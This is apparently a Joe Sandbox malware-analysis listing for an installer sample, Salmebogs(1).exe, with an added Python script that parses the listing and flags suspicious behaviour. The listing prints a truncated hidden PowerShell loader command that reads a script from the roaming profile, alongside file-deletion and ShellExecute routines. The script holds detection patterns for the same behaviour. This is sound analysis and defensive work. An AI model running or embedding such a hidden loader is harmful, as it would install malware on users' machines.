                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
                                                                        • Instruction ID: 6c025a846befaa099d481c36b27a79c5fc7dd1f0b3caa6cf802aff4301849ee4
                                                                        • Opcode Fuzzy Hash: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
                                                                        • Instruction Fuzzy Hash: 02B09236190A00BADA614B00EE09F457A62A7AC701F00C429B240240B0CAB200A0DB09
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00403243
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                        • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                        • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                        • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403EEB), ref: 0040411D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
                                                                        • Instruction ID: 30bcdc9e1ec4e9f5bd758bba81a049f6052f636b6f7eedaabba742a71ce1d9c6
                                                                        • Opcode Fuzzy Hash: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
                                                                        • Instruction Fuzzy Hash: 43A0113A008200AFCF028B80EF08C0ABB22ABE0300B22C038A28080030CB3208A0EB08
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404B20
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404B2B
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B75
                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404B88
                                                                        • SetWindowLongW.USER32(?,000000FC,00405100), ref: 00404BA1
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BB5
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BC7
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404BDD
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BE9
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BFB
                                                                        • DeleteObject.GDI32(00000000), ref: 00404BFE
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C29
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C35
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CCB
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CF6
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D0A
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404D39
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D47
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404D58
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E55
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EBA
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ECF
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF3
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F13
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404F28
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00404F38
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB1
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040505A
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405069
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405089
                                                                        • ShowWindow.USER32(?,00000000), ref: 004050D7
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004050E2
                                                                        • ShowWindow.USER32(00000000), ref: 004050E9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 1638840714-813528018
                                                                        • Opcode ID: 72ff75623ef579166a908c5f7c04ca3ddf3c3186be96de862a414ca8db5381fc
                                                                        • Instruction ID: 0cd49cefa4a501a52bc59e4f925d00b877300575b91fe519bcb2a61a8a5a243c
                                                                        • Opcode Fuzzy Hash: 72ff75623ef579166a908c5f7c04ca3ddf3c3186be96de862a414ca8db5381fc
                                                                        • Instruction Fuzzy Hash: B5026DB0900209AFEB10DF54DD85AAE7BB5FB85314F10813AF614BA2E1DB789D51CF98
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004045DB
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404605
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 004046B6
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 004046C1
                                                                        • lstrcmpiW.KERNEL32(: Completed,007A1F20,00000000,?,?), ref: 004046F3
                                                                        • lstrcatW.KERNEL32(?,: Completed), ref: 004046FF
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404711
                                                                          • Part of subcall function 00405756: GetDlgItemTextW.USER32(?,?,00000400,00404748), ref: 00405769
                                                                          • Part of subcall function 004062C1: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406324
                                                                          • Part of subcall function 004062C1: CharNextW.USER32(?,?,?,00000000), ref: 00406333
                                                                          • Part of subcall function 004062C1: CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406338
                                                                          • Part of subcall function 004062C1: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 0040634B
                                                                        • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 004047D4
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047EF
                                                                          • Part of subcall function 00404948: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049E9
                                                                          • Part of subcall function 00404948: wsprintfW.USER32 ref: 004049F2
                                                                          • Part of subcall function 00404948: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404A05
                                                                        Strings
                                                                        • powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk, xrefs: 004045A5
                                                                        • : Completed, xrefs: 004046ED, 004046F2, 004046FD
                                                                        • C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede, xrefs: 004046DC
                                                                        • A, xrefs: 004046AF
                                                                        Memory Dump Source
                                                                         • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: : Completed$A$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk
                                                                        • API String ID: 2624150263-1924153714
                                                                        • Opcode ID: e354fc6f01a67d9e6d2c19c26d7cfb6d1b338487a667e74d8ebdf199c81fc2f1
                                                                        • Instruction ID: 4e2f864614c1a86ea7b1c44af5ac01a56564cfcb46a86a7d63bcc09a88bdc754
                                                                        • Opcode Fuzzy Hash: e354fc6f01a67d9e6d2c19c26d7cfb6d1b338487a667e74d8ebdf199c81fc2f1
                                                                        • Instruction Fuzzy Hash: D0A19DF1900209ABDB11AFA5CC85AAF77B8EF85314F10843BF611B72D1DB7C89418B69
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405847
                                                                        • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040588F
                                                                        • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B8
                                                                        • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058C8
                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405968
                                                                        • FindClose.KERNEL32(00000000), ref: 00405977
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-1230155968
                                                                        • Opcode ID: 79936e2c09c2467da1847b8fcf84fb4c2ae0a6b28b626d6e6fcc789b16bbbf50
                                                                        • Instruction ID: 5c53005082933f3dff19d1f621f77edce462737186d9f3cfcfb8b04c389e649a
                                                                        • Opcode Fuzzy Hash: 79936e2c09c2467da1847b8fcf84fb4c2ae0a6b28b626d6e6fcc789b16bbbf50
                                                                        • Instruction Fuzzy Hash: 0941E671800A04FACB216B618C89BBF7678EF42729F24813BF801751C1D77C4996DEAE
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                        Strings
                                                                        • C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede, xrefs: 00402154
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede
                                                                        • API String ID: 542301482-246221564
                                                                        • Opcode ID: 779855a2f267a103eb7f53029cbd6d58a7f362876f4ec998b3b23ee8f38541bf
                                                                        • Instruction ID: 8e98f1ea9ac47b8784027b2eb306f9cd2ff55d848736a2d1ce7b03e60076e0bb
                                                                        • Opcode Fuzzy Hash: 779855a2f267a103eb7f53029cbd6d58a7f362876f4ec998b3b23ee8f38541bf
                                                                        • Instruction Fuzzy Hash: 68411A75A00209AFCF00DFA4CD88EAD7BB6FF48314B20456AF515EB2D1DBB99A41CB54
                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040432C
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404340
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040435D
                                                                        • GetSysColor.USER32(?), ref: 0040436E
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040437C
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040438A
                                                                        • lstrlenW.KERNEL32(?), ref: 0040438F
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040439C
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043B1
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040440A
                                                                        • SendMessageW.USER32(00000000), ref: 00404411
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040443C
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040447F
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 0040448D
                                                                        • SetCursor.USER32(00000000), ref: 00404490
                                                                        • ShellExecuteW.SHELL32(0000070B,open,007A69C0,00000000,00000000,00000001), ref: 004044A5
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004044B1
                                                                        • SetCursor.USER32(00000000), ref: 004044B4
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044E3
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044F5
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                        • String ID: : Completed$N$open
                                                                        • API String ID: 3615053054-3069340868
                                                                        • Opcode ID: bf7b86e320e160068de3af8e5dcc98207056fefab5135ebfd09c3f8c41110aee
                                                                        • Instruction ID: 31243ed57e0a4603bfcb1190bd50a407b821413fbba6bd0e9f8b9eea7b04e413
                                                                        • Opcode Fuzzy Hash: bf7b86e320e160068de3af8e5dcc98207056fefab5135ebfd09c3f8c41110aee
                                                                        • Instruction Fuzzy Hash: 887170B1900209BFDB10DF64DD85A6A7B69FB84354F00843AFB05B66E1CB78AD51CF98
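The per-function `APIs` and `Strings` bullets above (the hidden PowerShell command line at 004045A5, the `\*.*` enumeration feeding DeleteFileW, the CoCreateInstance call, and ShellExecuteW with the `open` verb) are regular enough to be parsed and triaged mechanically. The Python below is an added example, not part of this Joe Sandbox report or of Joe Security's tooling: it parses bullet lines in exactly the format printed here and applies a few triage rules. The sample lines are copied from this listing; the rule texts and the helper names (`parse_listing`, `triage`, `report`) are this example's own choices.

```python
"""Parse the per-function "APIs" / "Strings" bullet lines of a Joe Sandbox
IDA-plugin listing and run a few triage rules over them.

Added example; not part of the Joe Sandbox report or of Joe Security's tools.
The sample lines below are copied from this listing; the rule texts and the
helper names (parse_listing, triage, report) are this example's own choices.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Call lines:  Name.MODULE(arg,arg,...), ref: 0040XXXX
# optionally prefixed with "Part of subcall function 0040XXXX: " and, for a
# few calls such as wsprintfW, carrying no argument list at all. The greedy
# (.*) backtracks to the last ")" before ", ref:", so a quoted path such as
# "...\Salmebogs(1).exe" inside the argument list does not end the match early.
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
# String lines:  text, xrefs: 0040XXXX, 0040XXXX
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xrefs>[0-9A-F]{8}(?:, [0-9A-F]{8})*)$")
HIDDEN_PS_RE = re.compile(r"powershell(?:\.exe)?\s.*-windowstyle\s+hidden", re.I)

FINDING_HIDDEN_PS = "hidden PowerShell reading a script from the roaming profile (staged loader)"
FINDING_WILDCARD_DELETE = "FindFirstFileW over \\*.* combined with DeleteFileW (wildcard directory cleanup)"
FINDING_SHELLEXEC_OPEN = "ShellExecuteW with the open verb (launches an external target)"
FINDING_COM = "CoCreateInstance (COM object instantiated; check the CLSID)"


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    sub: Optional[str] = None  # caller address when listed as a subcall

@dataclass
class StringRef:
    text: str
    xrefs: List[str]

@dataclass
class FunctionEntry:
    calls: List[Call] = field(default_factory=list)
    strings: List[StringRef] = field(default_factory=list)


def parse_call(body: str) -> Optional[Call]:
    m = CALL_RE.match(body)
    if not m:
        return None
    # Split on "," only: none of the listed paths or format strings contain one.
    args = m["args"].split(",") if m["args"] is not None else []
    return Call(m["api"], m["module"], args, m["ref"], m["sub"])

def parse_string(body: str) -> Optional[StringRef]:
    m = STRING_RE.match(body)
    return StringRef(m["text"], m["xrefs"].split(", ")) if m else None

def parse_listing(lines: List[str]) -> List[FunctionEntry]:
    """Each "APIs" heading starts a new entry, "Strings" switches the bullet
    type, and any other heading (Memory Dump Source, Similarity, ...) ends the
    bullet lists so that their bullets are ignored."""
    entries: List[FunctionEntry] = []
    current, section = None, None
    for raw in lines:
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            section = "apis"
        elif line == "Strings":
            section = "strings"
        elif not line.startswith("•"):
            section = None
        elif current is not None and section is not None:
            body = line[1:].strip()
            parsed = parse_call(body) if section == "apis" else parse_string(body)
            if isinstance(parsed, Call):
                current.calls.append(parsed)
            elif isinstance(parsed, StringRef):
                current.strings.append(parsed)
    return entries

def triage(entry: FunctionEntry) -> List[str]:
    findings = []
    apis = {c.api for c in entry.calls}
    args = [a for c in entry.calls for a in c.args]
    if any(HIDDEN_PS_RE.search(s.text) and "\\AppData\\Roaming\\" in s.text for s in entry.strings):
        findings.append(FINDING_HIDDEN_PS)
    if {"FindFirstFileW", "DeleteFileW"} <= apis and r"\*.*" in args:
        findings.append(FINDING_WILDCARD_DELETE)
    if any(c.api == "ShellExecuteW" and "open" in c.args for c in entry.calls):
        findings.append(FINDING_SHELLEXEC_OPEN)
    if "CoCreateInstance" in apis:
        findings.append(FINDING_COM)
    return findings

def report(lines: List[str]):
    """(address of the entry's first call, findings) for every entry."""
    return [(e.calls[0].ref if e.calls else "?", triage(e)) for e in parse_listing(lines)]


# Sample input copied from the listing on this page (constructed test data).
SAMPLE_LISTING = [
    "APIs",
    r"• Part of subcall function 00405756: GetDlgItemTextW.USER32(?,?,00000400,00404748), ref: 00405769",
    r"• GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 004047D4",
    r"• Part of subcall function 00404948: wsprintfW.USER32 ref: 004049F2",
    "Strings",
    r"""• powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk, xrefs: 004045A5""",
    r"• : Completed, xrefs: 004046ED, 004046F2, 004046FD",
    "Memory Dump Source",
    r"• Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true",
    "APIs",
    r"• DeleteFileW.KERNEL32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405847",
    r"• lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040588F",
    r"• FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058C8",
    "Strings",
    "APIs",
    r"• CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114",
    "Strings",
    r"• C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede, xrefs: 00402154",
    "APIs",
    r"• ShellExecuteW.SHELL32(0000070B,open,007A69C0,00000000,00000000,00000001), ref: 004044A5",
]

if __name__ == "__main__":
    for ref, findings in report(SAMPLE_LISTING):
        print(ref, findings or "-")
```

Feeding the whole function listing of the report through `report()` gives one line per function with the triggered rules, which is enough to jump straight to the NSIS-style cleanup routine and the function that builds the hidden PowerShell command rather than reading every entry. The argument splitter is deliberately naive (a comma inside a quoted path would break it), and the hidden-PowerShell rule keys on `-windowstyle hidden` plus a `\AppData\Roaming\` path, so a loader that reads its script from another location needs an additional rule.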
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
